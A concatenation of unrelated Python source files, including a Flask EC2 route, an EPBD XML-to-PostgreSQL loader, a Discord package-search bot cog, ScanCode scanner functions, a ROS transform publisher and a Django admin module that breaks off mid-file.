@app.route("/ec2/terminate", methods=["POST"])
def terminate_ec2_instance():
try:
client = get_aws_client(request)
InstanceId = request.args.get("InstanceId")
response = client.terminate_instances(
InstanceIds=[InstanceId]
)
return jsonify(response["TerminatingInstances"][0]), 200
except Exception as error:
print(str(error))
return jsonify({'Message': "Unexpected Error occured", 'Error': str(error)}), 500
if __name__ == "__main__":
app.run(host=config["host"],
port=config["port"],
debug=False)
|
# -*- coding: utf-8 -*-
"""
Parses EPBD XML data and puts it in a PostgreSQL database.
Based on epbdparser.py made by RVO.
@author: Chris Lucas
"""
import argparse
import xml.sax
import psycopg2
from psycopg2.extensions import AsIs
class EqualError(Exception):
def __init__(self, msg):
self.msg = msg
class HigherError(Exception):
def __init__(self, msg):
self.msg = msg
class LowerError(Exception):
def __init__(self, msg):
self.msg = msg
# -----------------------------------------------------------------------------
# EpbdErrorHandler
# -----------------------------------------------------------------------------
class EpbdErrorHandler(xml.sax.ErrorHandler):
def error(self, exception):
print(exception)
def fatalError(self, exception):
print(exception)
# -----------------------------------------------------------------------------
# EpbdContentHandler
# -----------------------------------------------------------------------------
class EpbdContentHandler(xml.sax.ContentHandler):
def __init__(self, host, dbname, schema_name, table_name,
username, password='', port=5432, force_update=False):
self.Kolommen = {"Pand_postcode": "char(6)",
"Pand_huisnummer": "int",
"Pand_huisnummer_toev": "varchar(7)",
"Pand_bagverblijfsobjectid": "varchar(17)",
"Pand_opnamedatum": "date",
"Pand_berekingstype": "varchar(76)",
"Pand_energieprestatieindex": "real",
"Pand_energieklasse": "varchar(6)",
"Pand_registratiedatum": "date",
"Pand_energielabel_is_prive": "boolean",
"Meting_geldig_tot": "date",
"Pand_gebouwklasse": "char(1)",
"Pand_gebouwtype": "varchar(44)",
"Pand_gebouwsubtype": "varchar(19)",
"Pand_SBIcode": "int"}
self.host = host
self.dbname = dbname
self.user = username
self.password = password
self.port = port
self.schema_name = schema_name
self.table_name = table_name
self.force_update = force_update
# -------------------------------------------------------------------------
# aangeroepen bij de start van het document
# -------------------------------------------------------------------------
def startDocument(self):
# Connect met de database
conn_str = "host='{}' dbname='{}' user='{}' password='{}' port='{}'".format(self.host,
self.dbname,
self.user,
self.password,
self.port)
self.conn = psycopg2.connect(conn_str)
self.cursor = self.conn.cursor()
# als deze vlag waar wordt dan wordt data weg geschreven
self.isdata = False
self.isstuurcode = False
self.isvolgnummer = False
self.checked_volgnummer = True if self.force_update is True else False
# deze waarde wordt gebruikt om te bepalen welk element nu verwerkt
# wordt wordt gezet bij start element events, wordt gewist bij end
# element events
self.current = ""
# gebruik een dictionary object als buffer aangezien sommige tags
# niet altijd voorkomen
self.data = {}
for name in self.Kolommen:
self.data[name] = ""
query = "SELECT * FROM\
{}.laatste_volgnummer;".format(AsIs(self.schema_name))
self.cursor.execute(query)
self.db_volgnummer = self.cursor.fetchone()[0]
# -------------------------------------------------------------------------
# aangeroepen bij de start van een nieuwe tag
# -------------------------------------------------------------------------
def startElement(self, name, attrs):
if (name == "Mutatiebericht"):
pass
elif (name == "Mutatievolgnummer"):
self.isvolgnummer = True
elif (name == "Stuurcode"):
self.isstuurcode = True
elif (name in self.Kolommen):
# alleen bij deze tags schrijven we data echt weg naar de csv file
self.isdata = True
self.current = name
elif (name == "Pandcertificaat"):
# begin van een nieuwe rij in het csv bestand
# buffer opnieuw initialiseren
self.buffer = ""
# -------------------------------------------------------------------------
# aangeroepen na lezen content van een tag
# -------------------------------------------------------------------------
def characters(self, content):
# schrijf de waarde weg in de buffer indien het mag
if (self.isdata):
self.data[self.current] += content.strip()
elif (self.isstuurcode):
code = content.strip()
if code != "":
self.stuurcode = int(code)
elif (self.isvolgnummer):
nummer = content.strip()
if nummer != "":
self.volgnummer = int(nummer)
# -------------------------------------------------------------------------
# aangeroepen bij het einde van een tag
# -------------------------------------------------------------------------
def endElement(self, name):
if (name == "Mutatievolgnummer"):
if not (self.checked_volgnummer):
if self.volgnummer == self.db_volgnummer:
raise EqualError(
'Mutatievolgnummer gelijk aan het laatste volgnummer in database.')
elif self.volgnummer < self.db_volgnummer:
raise LowerError(
"Mutatievolgnummer lager dan het laatste volgnummer in de database.")
elif self.volgnummer > (self.db_volgnummer + 1):
print(self.db_volgnummer)
print(self.volgnummer)
raise HigherError(
"Mutatievolgnummer meer dan 1 hoger dan het laatste volgnummer in de database.")
self.checked_volgnummer = True
elif (name == "Pandcertificaat"):
# Maak een query aan om de data in de database te zetten
if int(self.stuurcode) == 1:
columns = "("
parameters = "("
values = []
for key, value in self.data.items():
if value != "":
columns += key + ", "
parameters += "%s" + ", "
values.append(value)
columns = columns[:-2] + ")"
parameters = parameters[:-2] + ")"
query = "INSERT INTO {}.{}\
{} VALUES {};".format(AsIs(self.schema_name),
AsIs(self.table_name),
columns,
parameters)
self.cursor.execute(query, values)
elif int(self.stuurcode) == 2:
values = [self.data["Pand_bagverblijfsobjectid"],
self.data["Pand_postcode"],
self.data["Pand_huisnummer"]]
query = "DELETE FROM {}.{} WHERE\
Pand_bagverblijfsobjectid = %s\
AND Pand_postcode = %s\
AND Pand_huisnummer = %s;".format(AsIs(self.schema_name),
AsIs(self.table_name))
self.cursor.execute(query, values)
# initialiseer de buffer opnieuw door alle waardes leeg te maken
for name in self.data.keys():
self.data[name] = ""
# na sluiten van een tag altijd de current waarde leeg maken
self.current = ""
# na sluiten van een tag altijd de vlag voor wegschrijven van data
# uitzetten
self.isdata = False
self.isstuurcode = False
self.isvolgnummer = False
# -------------------------------------------------------------------------
# aangeroepen bij het einde van het document
# -------------------------------------------------------------------------
def endDocument(self):
# gebruik het einde van het document om de connectie met de database
# te sluiten
query = "UPDATE {}.laatste_volgnummer\
SET volgnummer = %s;".format(AsIs(self.schema_name))
self.cursor.execute(query, [self.volgnummer])
self.cursor.close()
self.conn.commit()
self.conn.close()
def argument_parser():
"""
Define and return the arguments.
"""
description = (
"Reads an EPBD XML data file and writes it to a postgresql database.")
parser = argparse.ArgumentParser(description=description)
parser.add_argument('input_path', metavar='XMLFilePath',
help='The path to the EPBD XML file.')
required_named = parser.add_argument_group('required named arguments')
required_named.add_argument('-o', '--host',
help='The host adress of the PostgreSQL database.',
required=True)
required_named.add_argument('-d', '--dbname',
help='The name of the database to write to.',
required=True)
required_named.add_argument('-s', '--schema',
help='The name of the schema to write to.',
required=True)
required_named.add_argument('-t', '--table',
help='The name of the table to write to.',
required=True)
required_named.add_argument('-u', '--user',
help='The username to access the PostgreSQL database.',
required=True)
parser.add_argument('-p', '--password',
help='The password to access the PostgreSQL database.',
required=False,
default='')
parser.add_argument('-r', '--port',
help='The port of the PostgreSQL database.',
type=int,
required=False,
default=5432)
parser.add_argument('-f', '--force',
help='Force the update without checking the mutation number. WARNING: Could lead to an invalid dataset.',
action='store_true')
args = parser.parse_args()
return args
# -----------------------------------------------------------------------------
# start programma
# -----------------------------------------------------------------------------
def main():
args = argument_parser()
# parser object aanmaken
parser = xml.sax.make_parser()
# voeg objecten toe voor verwerking van de tags en error afhandeling
parser.setContentHandler(EpbdContentHandler(args.host, args.dbname, args.schema,
args.table, args.user, args.password,
args.port, args.force))
parser.setErrorHandler(EpbdErrorHandler())
# parse het bron bestand
with open(args.input_path, "r") as f:
src = xml.sax.xmlreader.InputSource()
src.setByteStream(f)
src.setEncoding("UTF-8")
parser.parse(src)
if __name__ == '__main__':
main()
|
from ._response import Response
class Me(Response):
@property
def account_status(self) -> str:
return self['accountStatus']
@property
def account_type(self) -> str:
return self['accountType']
@property
def pin_status(self) -> str:
return self['pinStatus']
@property
def username(self) -> str:
return self['profile']['nickname'] or ''
@property
def user_id(self) -> str:
return self['profile']['userId']
@property
def us_market_data_subscription_activated(self) -> bool:
return self['usMarketDataSubscriptionActivated']
|
import discord
from discord.commands.commands import Option, slash_command
from discord.commands.context import AutocompleteContext
from discord.ext import commands
import json
import re
import traceback
import urllib
import aiohttp
from datetime import datetime
from yarl import URL
from data.services.guild_service import guild_service
from aiocache import cached
from utils.config import cfg
from utils.logger import logger
from utils.context import BlooContext, BlooOldContext
from utils.menu import TweakMenu
from utils.permissions.checks import PermissionsFailure, whisper_in_general
from utils.permissions.permissions import permissions
package_url = 'https://api.parcility.co/db/package/'
search_url = 'https://api.parcility.co/db/search?q='
default_repos = [
"apt.bingner.com",
"apt.procurs.us",
"apt.saurik.com",
"apt.oldcurs.us",
"repo.chimera.sh",
"diatr.us/apt",
"repo.theodyssey.dev",
]
@cached(ttl=300)
async def package_request(package):
async with aiohttp.ClientSession() as client:
async with client.get(URL(f'{package_url}{package.get("Package")}', encoded=True)) as resp:
if resp.status == 200:
response = json.loads(await resp.text())
if response.get('code') == 200:
package["Price"] = response['data'].get("Price")
else:
package["Price"] = "No price data"
return package
return package
async def search_request(search):
async with aiohttp.ClientSession() as client:
async with client.get(URL(f'{search_url}{urllib.parse.quote(search)}', encoded=True)) as resp:
if resp.status == 200:
response = json.loads(await resp.text())
if response.get('code') == 404:
return []
elif response.get('code') == 200:
return response.get('data')
else:
return None
else:
return None
async def repo_autocomplete(ctx: AutocompleteContext):
repos = await fetch_repos()
repos = [repo["id"] for repo in repos if repo.get("id") and repo.get("id") is not None]
repos.sort()
return [repo for repo in repos if ctx.value.lower() in repo.lower()][:25]
@cached(ttl=3600)
async def fetch_repos():
async with aiohttp.ClientSession() as client:
async with client.get('https://api.parcility.co/db/repos/') as resp:
if resp.status == 200:
response = json.loads(await resp.text())
if response.get('code') == 404:
return []
elif response.get('code') == 200:
return response.get('data')
else:
return None
else:
return None
async def format_tweak_page(entries, all_pages, current_page, ctx):
entry = entries[0]
await package_request(entry)
# if not entry.get('repo').get('isDefault'):
# ctx.repo = entry.get('repo').get('url')
# else:
# ctx.repo = None
ctx.repo = entry.get('repo').get('url')
for repo in default_repos:
if repo in entry.get('repo').get('url'):
ctx.repo = None
break
embed = discord.Embed(title=entry.get('Name'), color=discord.Color.blue())
embed.description = discord.utils.escape_markdown(
entry.get('Description')) or "No description"
embed.add_field(name="Author", value=discord.utils.escape_markdown(
entry.get('Author') or "No author"), inline=True)
embed.add_field(name="Version", value=discord.utils.escape_markdown(
entry.get('Version') or "No version"), inline=True)
embed.add_field(name="Price", value=entry.get("Price") or (entry.get(
"Tag") and "cydia::commercial" in entry.get("Tag") and "Paid") or "Free")
embed.add_field(
name="Repo", value=f"[{entry.get('repo').get('label')}]({entry.get('repo').get('url')})" or "No repo", inline=True)
# if entry.get('repo').get('isDefault') is False:
# embed.add_field(
# name="Add Repo", value=f"[Click Here](https://sharerepo.stkc.win/?repo={entry.get('repo').get('url')})" or "No repo", inline=True)
try:
if entry.get('Depiction'):
embed.add_field(
name="More Info", value=f"[View Depiction]({entry.get('Depiction')})", inline=False)
else:
raise Exception("No depiction found!")
except:
embed.add_field(
name="More Info", value=f"[View on Parcility](https://parcility.co/package/{entry.get('Package')}/{entry.get('repo').get('slug')})", inline=False)
pattern = re.compile(
r"((http|https)\:\/\/)[a-zA-Z0-9\.\/\?\:@\-_=#]+\.([a-zA-Z]){2,6}([a-zA-Z0-9\.\&\/\?\:@\-_=#])*")
if (pattern.match(entry.get('Icon'))):
embed.set_thumbnail(url=entry.get('Icon'))
embed.set_footer(icon_url=entry.get('repo').get('icon'), text=discord.utils.escape_markdown(
entry.get('Package'))+f" • Page {current_page}/{len(all_pages)}" or "No package")
embed.timestamp = datetime.now()
return embed
async def format_repo_page(entries, all_pages, current_page, ctx):
repo_data = entries[0]
# if not repo_data.get('isDefault'):
# ctx.repo = repo_data.get('url')
# else:
# ctx.repo = None
ctx.repo = repo_data.get('url')
for repo in default_repos:
if repo in repo_data.get('url'):
ctx.repo = None
break
embed = discord.Embed(title=repo_data.get(
'Label'), color=discord.Color.blue())
embed.description = repo_data.get('Description')
embed.add_field(name="Packages", value=repo_data.get(
'package_count'), inline=True)
embed.add_field(name="Sections", value=repo_data.get(
'section_count'), inline=True)
embed.add_field(name="URL", value=repo_data.get('url'), inline=False)
# if repo_data.get('isDefault') is False:
# embed.add_field(
# name="Add Repo", value=f'[Click Here](https://sharerepo.stkc.win/?repo={repo_data.get("url")})', inline=True)
embed.add_field(
name="More Info", value=f'[View on Parcility](https://parcility.co/{repo_data.get("id")})', inline=False)
embed.set_thumbnail(url=repo_data.get('Icon'))
if repo_data.get('isDefault') == True:
embed.set_footer(text='Default Repo')
embed.set_footer(
text=f"Page {current_page} of {len(all_pages)}")
return embed
class Parcility(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.repo_url = 'https://api.parcility.co/db/repo/'
@commands.Cog.listener()
async def on_message(self, message: discord.Message):
if message.guild is None:
return
if not message.guild.id == cfg.guild_id:
return
author = message.author
if author is None:
return
if author.bot:
return
if not permissions.has(message.guild, author, 5) and message.channel.id == guild_service.get_guild().channel_general:
return
pattern = re.compile(
r".*?(?<!\[)+\[\[((?!\s+)([\w+\ \&\+\-\<\>\#\:\;\%]){2,})\]\](?!\])+.*")
if not pattern.match(message.content):
return
matches = pattern.findall(message.content)
if not matches:
return
search_term = matches[0][0].replace('[[', '').replace(']]', '')
if not search_term:
return
ctx = await self.bot.get_context(message, cls=BlooOldContext)
async with ctx.typing():
response = await search_request(search_term)
if response is None:
await ctx.send_error("An error occurred while searching for that tweak.")
return
elif len(response) == 0:
await ctx.send_error("Sorry, I couldn't find any tweaks with that name.")
return
menu = TweakMenu(pages=response, channel=ctx.channel,
format_page=format_tweak_page, interaction=False, ctx=ctx, no_skip=True)
await menu.start()
@whisper_in_general()
@slash_command(guild_ids=[cfg.guild_id], description="Search for a package")
async def package(self, ctx: BlooContext, *, search_term: Option(str, description="Name of the package to search for")):
async with ctx.typing():
response = await search_request(search_term)
if response is None:
raise commands.BadArgument("An error occurred while searching for that tweak.")
elif len(response) == 0:
raise commands.BadArgument("Sorry, I couldn't find any tweaks with that name.")
menu = TweakMenu(pages=response, channel=ctx.channel,
format_page=format_tweak_page, interaction=True, ctx=ctx, whisper=ctx.whisper, no_skip=True)
await menu.start()
@whisper_in_general()
@slash_command(guild_ids=[cfg.guild_id], description="Search for a repo")
async def repo(self, ctx: BlooContext, *, repo: Option(str, description="Name of the repo to search for", autocomplete=repo_autocomplete)):
async with ctx.typing():
data = await self.repo_request(repo)
if data is None:
raise commands.BadArgument(
'An error occurred while searching for that repo')
if not isinstance(data, list):
data = [data]
if len(data) == 0:
raise commands.BadArgument(
"Sorry, I couldn't find a repo by that name.")
menu = TweakMenu(data, ctx.channel, format_repo_page,
interaction=True, ctx=ctx, whisper=ctx.whisper)
await menu.start()
@cached(ttl=1800)
async def repo_request(self, repo):
async with aiohttp.ClientSession() as client:
async with client.get(f'{self.repo_url}{repo}') as resp:
if resp.status == 200:
response = json.loads(await resp.text())
if response.get('code') == 404:
return []
elif response.get('code') == 200:
return response.get('data')
else:
return None
else:
return None
@package.error
@repo.error
async def info_error(self, ctx: BlooContext, error):
if isinstance(error, discord.ApplicationCommandInvokeError):
error = error.original
if (isinstance(error, commands.MissingRequiredArgument)
or isinstance(error, PermissionsFailure)
or isinstance(error, commands.BadArgument)
or isinstance(error, commands.BadUnionArgument)
or isinstance(error, commands.MissingPermissions)
or isinstance(error, commands.BotMissingPermissions)
or isinstance(error, commands.MaxConcurrencyReached)
or isinstance(error, commands.NoPrivateMessage)):
await ctx.send_error(error)
else:
await ctx.send_error("A fatal error occured. Tell <@848159481255034891> about this.")
logger.error(traceback.format_exc())
def setup(bot):
bot.add_cog(Parcility(bot))
|
from sanic_testing.manager import TestManager
__version__ = "22.3.0"
__all__ = ("TestManager",)
|
#
# Copyright (c) 2018 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from collections import OrderedDict
from itertools import islice
from os.path import getsize
import logging
import sys
from commoncode.filetype import get_last_modified_date
from commoncode.hash import multi_checksums
from typecode.contenttype import get_type
from scancode import ScancodeError
TRACE = False
logger = logging.getLogger(__name__)
if TRACE:
logging.basicConfig(stream=sys.stdout)
logger.setLevel(logging.DEBUG)
"""
Main scanning functions.
Each scanner is a function that accepts a location and returns a sequence of
mappings as results.
Note: this API is unstable and still evolving.
"""
def get_copyrights(location, deadline=sys.maxsize, **kwargs):
"""
Return a mapping with a single 'copyrights' key with a value that is a list
of mappings for copyright detected in the file at `location`.
"""
from cluecode.copyrights import detect_copyrights
copyrights = []
holders = []
authors = []
for dtype, value, start, end in detect_copyrights(location, deadline=deadline):
if dtype == 'copyrights':
copyrights.append(
OrderedDict([
('value', value),
('start_line', start),
('end_line', end)
])
)
elif dtype == 'holders':
holders.append(
OrderedDict([
('value', value),
('start_line', start),
('end_line', end)
])
)
elif dtype == 'authors':
authors.append(
OrderedDict([
('value', value),
('start_line', start),
('end_line', end)
])
)
results = OrderedDict([
('copyrights', copyrights),
('holders', holders),
('authors', authors),
])
return results
def get_emails(location, threshold=50, test_slow_mode=False, test_error_mode=False, **kwargs):
"""
Return a mapping with a single 'emails' key with a value that is a list of
mappings for emails detected in the file at `location`.
Return only up to `threshold` values. Return all values if `threshold` is 0.
If test_mode is True, the scan will be slow for testing purpose and pause
for one second.
"""
if test_error_mode:
raise ScancodeError('Triggered email failure')
if test_slow_mode:
import time
time.sleep(1)
from cluecode.finder import find_emails
results = []
found_emails = ((em, ln) for (em, ln) in find_emails(location) if em)
if threshold:
found_emails = islice(found_emails, threshold)
for email, line_num in found_emails:
result = OrderedDict()
results.append(result)
result['email'] = email
result['start_line'] = line_num
result['end_line'] = line_num
return dict(emails=results)
def get_urls(location, threshold=50, **kwargs):
"""
Return a mapping with a single 'urls' key with a value that is a list of
mappings for urls detected in the file at `location`.
Return only up to `threshold` values. Return all values if `threshold` is 0.
"""
from cluecode.finder import find_urls
results = []
found_urls = ((u, ln) for (u, ln) in find_urls(location) if u)
if threshold:
found_urls = islice(found_urls, threshold)
for urls, line_num in found_urls:
result = OrderedDict()
results.append(result)
result['url'] = urls
result['start_line'] = line_num
result['end_line'] = line_num
return dict(urls=results)
DEJACODE_LICENSE_URL = 'https://enterprise.dejacode.com/urn/urn:dje:license:{}'
SPDX_LICENSE_URL = 'https://spdx.org/licenses/{}'
def get_licenses(location, min_score=0,
include_text=False, license_text_diagnostics=False,
license_url_template=DEJACODE_LICENSE_URL,
deadline=sys.maxsize, **kwargs):
"""
Return a mapping or detected_licenses for licenses detected in the file at
`location`
This mapping contains two keys:
- 'licenses' with a value that is list of mappings of license information.
- 'license_expressions' with a value that is list of license expression
strings.
`minimum_score` is a minimum score threshold from 0 to 100. The default is 0
means that all license matches are returned. Otherwise, matches with a score
below `minimum_score` are returned.
if `include_text` is True, matched text is included in the returned
`licenses` data.
"""
from licensedcode import cache
idx = cache.get_index()
detected_licenses = []
detected_expressions = []
matches = idx.match(
location=location, min_score=min_score, deadline=deadline, **kwargs)
for match in matches:
matched_text = None
if include_text:
if license_text_diagnostics:
matched_text = match.matched_text(whole_lines=False, highlight=True)
else:
matched_text = match.matched_text(whole_lines=True, highlight=False)
detected_expressions.append(match.rule.license_expression)
detected_licenses.extend(
_licenses_data_from_match(match, matched_text, license_url_template)
)
return OrderedDict([
('licenses', detected_licenses),
('license_expressions', detected_expressions),
])
def _licenses_data_from_match(match, matched_text=None,
license_url_template=DEJACODE_LICENSE_URL):
"""
Return a list of "licenses" scan data built from a license match.
Used directly only internally for testing.
"""
from licensedcode import cache
licenses = cache.get_licenses_db()
detected_licenses = []
for license_key in match.rule.license_keys():
lic = licenses.get(license_key)
result = OrderedDict()
detected_licenses.append(result)
result['key'] = lic.key
result['score'] = match.score()
result['name'] = lic.name
result['short_name'] = lic.short_name
result['category'] = lic.category
result['is_exception'] = lic.is_exception
result['owner'] = lic.owner
result['homepage_url'] = lic.homepage_url
result['text_url'] = lic.text_urls[0] if lic.text_urls else ''
result['reference_url'] = license_url_template.format(lic.key)
spdx_key = lic.spdx_license_key
result['spdx_license_key'] = spdx_key
if spdx_key:
spdx_key = lic.spdx_license_key.rstrip('+')
spdx_url = SPDX_LICENSE_URL.format(spdx_key)
else:
spdx_url = ''
result['spdx_url'] = spdx_url
result['start_line'] = match.start_line
result['end_line'] = match.end_line
matched_rule = result['matched_rule'] = OrderedDict()
matched_rule['identifier'] = match.rule.identifier
matched_rule['license_expression'] = match.rule.license_expression
matched_rule['licenses'] = match.rule.license_keys()
matched_rule['is_license_text'] = match.rule.is_license_text
matched_rule['is_license_notice'] = match.rule.is_license_notice
matched_rule['is_license_reference'] = match.rule.is_license_reference
matched_rule['is_license_tag'] = match.rule.is_license_tag
matched_rule['matcher'] = match.matcher
matched_rule['rule_length'] = match.rule.length
matched_rule['matched_length'] = match.len()
matched_rule['match_coverage'] = match.coverage()
matched_rule['rule_relevance'] = match.rule.relevance
# FIXME: for sanity this should always be included?????
if matched_text:
result['matched_text'] = matched_text
return detected_licenses
def get_package_info(location, **kwargs):
"""
Return a mapping of package manifest information detected in the
file at `location`.
Note that all exceptions are caught if there are any errors while parsing a
package manifest.
"""
from packagedcode.recognize import recognize_packages
try:
recognized_packages = recognize_packages(location)
if recognized_packages:
return dict(packages=[package.to_dict() for package in recognized_packages])
except Exception as e:
if TRACE:
logger.error('get_package_info: {}: Exception: {}'.format(location, e))
pass
return dict(packages=[])
def get_file_info(location, **kwargs):
"""
Return a mapping of file information collected for the file at `location`.
"""
result = OrderedDict()
# TODO: move date and size these to the inventory collection step???
result['date'] = get_last_modified_date(location) or None
result['size'] = getsize(location) or 0
sha1, md5 = multi_checksums(location, ('sha1', 'md5',)).values()
result['sha1'] = sha1
result['md5'] = md5
collector = get_type(location)
result['mime_type'] = collector.mimetype_file or None
result['file_type'] = collector.filetype_file or None
result['programming_language'] = collector.programming_language or None
result['is_binary'] = bool(collector.is_binary)
result['is_text'] = bool(collector.is_text)
result['is_archive'] = bool(collector.is_archive)
result['is_media'] = bool(collector.is_media)
result['is_source'] = bool(collector.is_source)
result['is_script'] = bool(collector.is_script)
return result
def extract_archives(location, recurse=True):
"""
Yield ExtractEvent while extracting archive(s) and compressed files at
`location`. If `recurse` is True, extract nested archives-in-archives
recursively.
Archives and compressed files are extracted in a directory named
"<file_name>-extract" created in the same directory as the archive.
Note: this API is returning an iterable and NOT a sequence.
"""
from extractcode.extract import extract
from extractcode import default_kinds
for xevent in extract(location, kinds=default_kinds, recurse=recurse):
yield xevent
|
import time
import mysql.connector
import hashlib
import zlib
inp = input('Enter something: ')
salt = input('Enter salt ')
dk = hashlib.pbkdf2_hmac('sha256', inp.encode('utf-8'), salt.encode('utf-8'), 100000)
print(dk)
|
#! /home/znfs/pyenv_pyrobot_python2/bin/python
from robot_utils import *
import tf
import yaml
from geometry_msgs.msg import Pose
param_file = '/home/znfs/project_ws/intera/src/iros2021/files/kinect_calibration.yaml'
def quaternion_to_trans_matrix(x, y, z, w, trans_x, trans_y, trans_z):
x_2, y_2, z_2 = x * x, y * y, z * z
xy, xz, yz, wx, wy, wz = x * y, x * z, y * z, w * x, w * y, w * z
# origin_rotation_matrix [1 - 2 * y_2 - 2 * z_2, 2 * xy + 2 * wz, 2 * xz - 2 * wy,
# 2 * xy - 2 * wz, 1 - 2 * x_2 - 2 * z_2, 2 * yz + 2 * wx,
# 2 * xz + 2 * wy, 2 * yz - 2 * wx, 1 - 2 * x_2 - 2 * y_2]
translation_matrix = np.array([1 - 2 * y_2 - 2 * z_2, 2 * xy - 2 * wz, 2 * xz + 2 * wy, trans_x,
2 * xy + 2 * wz, 1 - 2 * x_2 - 2 * z_2, 2 * yz - 2 * wx, trans_y,
2 * xz - 2 * wy, 2 * yz + 2 * wx, 1 - 2 * x_2 - 2 * y_2, trans_z,
0, 0, 0, 1
])
return translation_matrix.reshape((4, 4))
def resolve_ext(yaml_data):
orientation = yaml_data['rot']
trans = yaml_data['trans']
trans_matrix = quaternion_to_trans_matrix(orientation[0], orientation[1], orientation[2], orientation[3],
trans[0], trans[1], trans[2])
return trans_matrix
# lookup tf transform between two frames
def lookupTransform(tf_listener, target, source):
tf_listener.waitForTransform(target, source, rospy.Time(), rospy.Duration(4.0))
trans, rot = tf_listener.lookupTransform(target, source, rospy.Time())
euler = tf.transformations.euler_from_quaternion(rot)
source_target = tf.transformations.compose_matrix(translate=trans, angles=euler)
return trans, rot, source_target
def resolve(trans, rot):
pose = Pose()
pose.position.x = trans[0]
pose.position.y = trans[1]
pose.position.z = trans[2]
pose.orientation.x = rot[0]
pose.orientation.y = rot[1]
pose.orientation.z = rot[2]
pose.orientation.w = rot[3]
return pose
def main():
rospy.init_node('publish_static_tf')
pub = rospy.Publisher('/base2ee', Pose, queue_size=1)
file = open(param_file, 'r')
file_data = file.read()
tf_listener = tf.TransformListener()
tf_broadcaster = tf.TransformBroadcaster()
# loop rate
rate = rospy.Rate(100)
k_extrin = resolve_ext(yaml.safe_load(file_data))
rospy.loginfo("start to pub /base2ee tf topic")
while not rospy.is_shutdown():
trans, rot, source_target = lookupTransform(tf_listener, '/base', '/right_gripper_tip')
base2eePose = resolve(trans, rot)
pub.publish(base2eePose)
if __name__ == "__main__":
main()
|
import time
from random import randint
import getpass
def log(func):
def inner(*args, **kwargs):
start_time = time.perf_counter()
ret = func(*args, **kwargs)
elapsed_time = time.perf_counter() - start_time
ms_flag = False
if elapsed_time < 1:
elapsed_time *= 1000
ms_flag = True
func_name = func.__name__.split('_')
func_name = ' '.join(map(lambda x: x.capitalize(), func_name))
with open('machine.log', 'a') as f:
print('({})Running: {} [ exec-time = {:.3f} {} ]'.format(
getpass.getuser(),
func_name,
elapsed_time,
'ms' if ms_flag else 's'), file=f)
return ret
return inner
class CoffeeMachine():
water_level = 100
@log
def start_machine(self):
if self.water_level > 20:
return True
else:
print("Please add water!")
return False
@log
def boil_water(self):
return "boiling..."
@log
def make_coffee(self):
if self.start_machine():
for _ in range(20):
time.sleep(0.1)
self.water_level -= 1
print(self.boil_water())
print("Coffee is ready!")
@log
def add_water(self, water_level):
time.sleep(randint(1, 5))
self.water_level += water_level
print("Blub blub blub...")
if __name__ == "__main__":
machine = CoffeeMachine()
for i in range(0, 5):
machine.make_coffee()
machine.make_coffee()
machine.add_water(70)
|
import pandas as pd
from common import PathLike
def clean_data(
input_path: PathLike,
output_path: PathLike
):
df = pd.read_csv(input_path)
df = df.dropna()
df.to_csv(output_path)
clean_data(
input_path="data.csv",
output_path="clean_data.csv"
)
|
from django.contrib import admin
from .models import (
OHLCV,
Account,
Bot,
Currency,
Market,
Order,
OrderErrorLog,
Saving,
Trade,
)
class BotInline(admin.TabularInline):
model = Bot
extra = 0
class OrderInline(admin.TabularInline):
model = Order
extra = 0
class TradeInline(admin.TabularInline):
model = Trade
extra = 0
class ErrorInline(admin.TabularInline):
model = OrderErrorLog
extra = 0
class SavingInline(admin.TabularInline):
model = Saving
extra = 0
class AccountAdmin(admin.ModelAdmin):
fieldsets = [
("User", {"fields": ["user"]}),
(
"Exchange information",
{
"fields": [
"exchange",
"api_key",
"secret",
"password",
"default_fee_rate",
]
},
),
]
list_display = ("user", "exchange")
list_filter = ["user", "exchange"]
search_fields = ["user"]
inlines = [BotInline]
class CurrencyAdmin(admin.ModelAdmin):
fields = ["short", "name"]
list_display = ("short", "name")
search_fields = ["short", "name"]
class MarketAdmin(admin.ModelAdmin):
fieldsets = [
("Base", {"fields": ["exchange", "active"]}),
("Currencies", {"fields": ["base", "quote"]}),
(
"Market information",
{
"classes": ("collapse",),
"fields": [
"precision_amount",
"precision_price",
"limits_amount_min",
"limits_amount_max",
"limits_price_min",
"limits_price_max",
],
},
),
]
list_display = ("symbol", "exchange", "active")
list_filter = ["exchange", "active"]
search_fields = ["base", "quote"]
class BotAdmin(admin.ModelAdmin):
readonly_fields = (
"created",
"start_amount",
"current_amount",
"estimate_current_amount",
"roi",
"estimate_roi",
"orders_count",
)
fieldsets = [
("Base", {"fields": ["account", "active"]}),
("Trade Mode: Wave Rider", {"fields": ["market", "timeframe"]}),
(
"Trade Mode: Rising Chart",
{"fields": ["quote", "max_amount", "min_rise", "stop_loss", "lock_time"]},
),
(
"Stats",
{
"fields": [
"start_amount",
"current_amount",
"estimate_current_amount",
"roi",
"estimate_roi",
"orders_count",
]
},
),
]
list_display = (
"account",
"market",
"created",
"timeframe",
"active",
"roi",
"estimate_roi",
"orders_count",
)
list_filter = ["account", "timeframe", "active"]
search_fields = ["account", "market", "created"]
inlines = [OrderInline, SavingInline]
class OrderAdmin(admin.ModelAdmin):
readonly_fields = ("errors",)
fieldsets = [
("Base", {"fields": ["bot", "errors"]}),
(
"Order",
{
"fields": [
"next_order",
"order_id",
"timestamp",
"status",
"order_type",
"side",
"price",
"amount",
"filled",
]
},
),
("Fee", {"fields": ["fee_currency", "fee_cost", "fee_rate"]}),
("Rising Chart", {"fields": ["last_price_tick", "market"]}),
]
list_display = (
"next_order",
"order_id",
"bot",
"timestamp",
"status",
"side",
